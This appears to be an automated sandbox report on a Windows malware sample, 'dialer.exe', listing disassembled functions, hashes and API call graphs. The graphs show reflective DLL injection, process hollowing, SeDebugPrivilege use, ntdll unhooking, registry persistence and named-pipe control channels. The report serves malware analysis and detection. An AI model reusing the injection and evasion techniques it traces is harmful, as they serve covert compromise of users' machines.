                                                              • Instruction ID: 84b5d480bb409fd40947743b60f86dcaefe1a7f775b724482f36f78cc6f57770
                                                              • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction Fuzzy Hash: 9811FB36214B8082EB618B25E44435AB7E5FB88B94F694225EECD07759EF3CC551CB00
                                                              Function 000002BAAED87356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: ierarchy Descriptor'$riptor at (
                                                              • API String ID: 592178966-758928094
                                                              • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction ID: bcb890a832a902aa060464321f2cefe5ffbff100b0cde4ba18012b4dd5ede165
                                                              • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction Fuzzy Hash: 67E08661640B4490EF019F61EC4429833B0DB58B64B9891229D9C06311FB38D5E9C321
                                                              Function 000002BAAED873B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: Locator'$riptor at (
                                                              • API String ID: 592178966-4215709766
                                                              • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction ID: ba3002130823c0fe9a4b0d3e5fc32b0b8af4c4ef075c642b2c03889fc6bce62f
                                                              • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction Fuzzy Hash: B1E08C61A00B4890EF029F21E8802A873B0EB68B64B989122CA8C06311FB38D5E9C321
                                                              Function 000002BAAEDB1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID:
                                                              • API String ID: 756756679-0
                                                              • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction ID: 0c7fe6e54972cd04bdfc5696195942a5bceecb5b4f5d22cc4423dcb7b8964cf7
                                                              • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction Fuzzy Hash: 2D11A025601B5485FA55DF6AA80C32AB3B1FBC9FC1F284128DE8D43766EF39C442C311
                                                              Function 000002BAAEDB1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction ID: 7534aa5f6862bd6bb294603f2423bfa4a52c40d89ce4ea09ebafc7b2bbd29c72
                                                              • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction Fuzzy Hash: C5E0397560160486EB058BA2D80834A37F1EB89F86F1480248A9D07391DF7DC499C761

                                                              Execution Graph

                                                              Execution Coverage:48.4%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:227
                                                              Total number of Limit Nodes:23
                                                              execution_graph 384 140002bf8 385 140002c05 384->385 387 140002c25 ConnectNamedPipe 385->387 388 140002c1a Sleep 385->388 395 140001b54 AllocateAndInitializeSid 385->395 389 140002c83 Sleep 387->389 390 140002c34 ReadFile 387->390 388->385 392 140002c8e DisconnectNamedPipe 389->392 391 140002c57 390->391 390->392 402 140002524 391->402 392->387 396 140001bb1 SetEntriesInAclW 395->396 397 140001c6f 395->397 396->397 398 140001bf5 LocalAlloc 396->398 397->385 398->397 399 140001c09 InitializeSecurityDescriptor 398->399 399->397 400 140001c19 SetSecurityDescriptorDacl 399->400 400->397 401 140001c30 CreateNamedPipeW 400->401 401->397 403 140002531 402->403 404 140002539 WriteFile 402->404 406 1400010c0 403->406 404->392 444 1400018ac OpenProcess 406->444 409 1400014ba 409->404 410 140001122 OpenProcess 410->409 411 14000113e OpenProcess 410->411 412 140001161 K32GetModuleFileNameExW 411->412 413 1400011fd NtQueryInformationProcess 411->413 414 1400011aa CloseHandle 412->414 415 14000117a PathFindFileNameW lstrlenW 412->415 416 1400014b1 CloseHandle 413->416 417 140001224 413->417 414->413 419 1400011b8 414->419 415->414 418 140001197 StrCpyW 415->418 416->409 417->416 420 140001230 OpenProcessToken 417->420 418->414 419->413 421 1400011d8 StrCmpIW 419->421 420->416 422 14000124e GetTokenInformation 420->422 421->416 421->419 423 1400012f1 422->423 424 140001276 GetLastError 422->424 425 1400012f8 CloseHandle 423->425 424->423 426 140001281 LocalAlloc 424->426 425->416 431 14000130c 425->431 426->423 427 140001297 GetTokenInformation 426->427 428 1400012df 427->428 429 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 427->429 430 1400012e6 LocalFree 428->430 429->430 430->425 431->416 432 14000139b StrStrA 431->432 433 1400013c3 431->433 432->431 434 1400013c8 432->434 433->416 434->416 435 1400013f3 VirtualAllocEx 434->435 435->416 436 140001420 WriteProcessMemory 435->436 436->416 437 14000143b 436->437 449 14000211c 437->449 439 14000145b 439->416 440 140001478 WaitForSingleObject 439->440 443 140001471 CloseHandle 439->443 442 140001487 GetExitCodeThread 440->442 440->443 442->443 443->416 445 14000110e 444->445 446 1400018d8 IsWow64Process 444->446 445->409 445->410 447 1400018f8 CloseHandle 446->447 448 1400018ea 446->448 447->445 448->447 452 140001914 GetModuleHandleA 449->452 453 140001934 GetProcAddress 452->453 454 14000193d 452->454 453->454 455 140002258 458 14000226c 455->458 482 140001f2c 458->482 461 140001f2c 14 API calls 462 14000228f GetCurrentProcessId OpenProcess 461->462 463 140002321 FindResourceExA 462->463 464 1400022af OpenProcessToken 462->464 467 140002341 SizeofResource 463->467 468 140002261 ExitProcess 463->468 465 1400022c3 LookupPrivilegeValueW 464->465 466 140002318 CloseHandle 464->466 465->466 469 1400022da AdjustTokenPrivileges 465->469 466->463 467->468 470 14000235a LoadResource 467->470 469->466 471 140002312 GetLastError 469->471 470->468 472 14000236e LockResource GetCurrentProcessId 470->472 471->466 496 1400017ec GetProcessHeap HeapAlloc 472->496 474 14000238b RegCreateKeyExW 475 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 474->475 476 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 474->476 477 14000250f SleepEx 475->477 478 1400023f4 RegSetKeySecurity LocalFree 476->478 479 14000240e RegCreateKeyExW 476->479 477->477 478->479 480 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 479->480 481 14000247f RegCloseKey 479->481 480->481 481->475 483 140001f35 StrCpyW StrCatW GetModuleHandleW 482->483 484 1400020ff 482->484 483->484 485 140001f86 GetCurrentProcess K32GetModuleInformation 483->485 484->461 486 1400020f6 FreeLibrary 485->486 487 140001fb6 CreateFileW 485->487 486->484 487->486 488 140001feb CreateFileMappingW 487->488 489 140002014 MapViewOfFile 488->489 490 1400020ed CloseHandle 488->490 491 1400020e4 CloseHandle 489->491 492 140002037 489->492 490->486 491->490 492->491 493 140002050 lstrcmpiA 492->493 495 14000208e 492->495 493->492 494 140002090 VirtualProtect VirtualProtect 493->494 494->491 495->491 502 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 496->502 498 140001885 GetProcessHeap HeapFree 499 140001830 499->498 500 140001851 OpenProcess 499->500 500->499 501 140001867 TerminateProcess CloseHandle 500->501 501->499 503 140001565 502->503 504 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 502->504 503->504 505 14000157a OpenProcess 503->505 507 14000161a CloseHandle 503->507 508 1400015c9 ReadProcessMemory 503->508 504->499 505->503 506 140001597 K32EnumProcessModules 505->506 506->503 506->507 507->503 508->503 509 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 510 140002b8e K32EnumProcesses 509->510 511 140002beb Sleep 510->511 513 140002ba3 510->513 511->510 512 140002bdc 512->511 513->512 515 140002540 513->515 516 140002558 515->516 517 14000254d 515->517 516->513 518 1400010c0 30 API calls 517->518 518->516 519 1400021d0 520 1400021dd 519->520 521 140001b54 6 API calls 520->521 522 1400021f2 Sleep 520->522 523 1400021fd ConnectNamedPipe 520->523 521->520 522->520 524 140002241 Sleep 523->524 525 14000220c ReadFile 523->525 526 14000224c DisconnectNamedPipe 524->526 525->526 527 14000222f 525->527 526->523 527->526 528 140002560 529 140002592 528->529 530 14000273a 528->530 531 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 529->531 532 140002598 529->532 533 140002748 530->533 534 14000297e ReadFile 530->534 535 140002633 531->535 537 140002704 531->537 538 1400025a5 532->538 539 1400026bd ExitProcess 532->539 540 140002751 533->540 541 140002974 533->541 534->535 536 1400029a8 534->536 536->535 549 1400018ac 3 API calls 536->549 537->535 551 1400010c0 30 API calls 537->551 545 1400025ae 538->545 546 140002660 RegOpenKeyExW 538->546 542 140002919 540->542 543 14000275c 540->543 544 14000175c 22 API calls 541->544 550 140001944 ReadFile 542->550 547 140002761 543->547 548 14000279d 543->548 544->535 545->535 561 1400025cb ReadFile 545->561 552 1400026a1 546->552 553 14000268d RegDeleteValueW 546->553 547->535 610 14000217c 547->610 613 140001944 548->613 554 1400029c7 549->554 556 140002928 550->556 551->537 597 1400019c4 SysAllocString SysAllocString CoInitializeEx 552->597 553->552 554->535 565 1400029db GetProcessHeap HeapAlloc 554->565 566 140002638 554->566 556->535 568 140001944 ReadFile 556->568 560 1400026a6 605 14000175c GetProcessHeap HeapAlloc 560->605 561->535 563 1400025f5 561->563 563->535 575 1400018ac 3 API calls 563->575 571 1400014d8 13 API calls 565->571 577 140002a90 4 API calls 566->577 567 1400027b4 ReadFile 567->535 572 1400027dc 567->572 573 14000293f 568->573 588 140002a14 571->588 572->535 578 1400027e9 GetProcessHeap HeapAlloc ReadFile 572->578 573->535 579 140002947 ShellExecuteW 573->579 581 140002614 575->581 577->535 583 14000290b GetProcessHeap 578->583 584 14000282d 578->584 579->535 581->535 581->566 587 140002624 581->587 582 140002a49 GetProcessHeap 585 140002a52 HeapFree 582->585 583->585 584->583 589 140002881 lstrlenW GetProcessHeap HeapAlloc 584->589 590 14000285e 584->590 585->535 591 1400010c0 30 API calls 587->591 588->582 637 1400016cc 588->637 631 140002a90 CreateFileW 589->631 590->583 617 140001c88 590->617 591->535 598 140001a11 CoInitializeSecurity 597->598 599 140001b2c SysFreeString SysFreeString 597->599 600 140001a59 CoCreateInstance 598->600 601 140001a4d 598->601 599->560 602 140001b26 CoUninitialize 600->602 603 140001a88 VariantInit 600->603 601->600 601->602 602->599 604 140001ade 603->604 604->602 606 1400014d8 13 API calls 605->606 608 14000179a 606->608 607 1400017c8 GetProcessHeap HeapFree 608->607 609 1400016cc 5 API calls 608->609 609->608 611 140001914 2 API calls 610->611 612 140002191 611->612 614 140001968 ReadFile 613->614 615 14000198b 614->615 616 1400019a5 614->616 615->614 615->616 616->535 616->567 618 140001cbb 617->618 619 140001cce CreateProcessW 618->619 621 140001e97 618->621 623 140001e62 OpenProcess 618->623 625 140001dd2 VirtualAlloc 618->625 627 140001d8c WriteProcessMemory 618->627 619->618 620 140001d2b VirtualAllocEx 619->620 620->618 622 140001d60 WriteProcessMemory 620->622 621->583 622->618 623->618 624 140001e78 TerminateProcess 623->624 624->618 625->618 626 140001df1 GetThreadContext 625->626 626->618 628 140001e09 WriteProcessMemory 626->628 627->618 628->618 629 140001e30 SetThreadContext 628->629 629->618 630 140001e4e ResumeThread 629->630 630->618 630->621 632 1400028f7 GetProcessHeap HeapFree 631->632 633 140002ada WriteFile 631->633 632->583 634 140002b1c CloseHandle 633->634 635 140002afe 633->635 634->632 635->634 636 140002b02 WriteFile 635->636 636->634 638 140001745 637->638 639 1400016eb OpenProcess 637->639 638->582 639->638 640 140001703 639->640 641 14000211c 2 API calls 640->641 642 140001723 641->642 643 14000173c CloseHandle 642->643 644 140001731 CloseHandle 642->644 643->638 644->643

                                                              Callgraph

                                                              Executed Functions

                                                              Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                              • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                              • API String ID: 4177739653-1130149537
                                                              • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                              • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                              • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                              • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                              Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                              • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                              • API String ID: 2561231171-3753927220
                                                              • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                              • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                              • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                              • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                              Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                              • String ID:
                                                              • API String ID: 4084875642-0
                                                              • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                              • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                              • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                              • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                              Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                              • String ID: .text$C:\Windows\System32\
                                                              • API String ID: 2721474350-832442975
                                                              • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                              • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                              • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                              • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                              Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                              • String ID: M$\\.\pipe\dialerchildproc64
                                                              • API String ID: 2203880229-3489460547
                                                              • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                              • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                              • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                              • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                              Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 129 1400021d0-1400021da 130 1400021dd-1400021f0 call 140001b54 129->130 133 1400021f2-1400021fb Sleep 130->133 134 1400021fd-14000220a ConnectNamedPipe 130->134 133->130 135 140002241-140002246 Sleep 134->135 136 14000220c-14000222d ReadFile 134->136 137 14000224c-140002255 DisconnectNamedPipe 135->137 136->137 138 14000222f-140002234 136->138 137->134 138->137 139 140002236-14000223f 138->139 139->137
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                              • String ID: \\.\pipe\dialercontrol_redirect64
                                                              • API String ID: 2071455217-3440882674
                                                              • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                              • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                              • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                              • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                              Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                              • String ID:
                                                              • API String ID: 3197395349-0
                                                              • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                              • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                              • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                              • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                              Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 149 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 150 140002b8e-140002ba1 K32EnumProcesses 149->150 151 140002ba3-140002bb2 150->151 152 140002beb-140002bf4 Sleep 150->152 153 140002bb4-140002bb8 151->153 154 140002bdc-140002be7 151->154 152->150 155 140002bba 153->155 156 140002bcb-140002bce call 140002540 153->156 154->152 157 140002bbe-140002bc3 155->157 160 140002bd2 156->160 158 140002bc5-140002bc9 157->158 159 140002bd6-140002bda 157->159 158->156 158->157 159->153 159->154 160->159
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                              • String ID:
                                                              • API String ID: 3676546796-0
                                                              • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                              • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                              • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                              • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                              Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                              • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
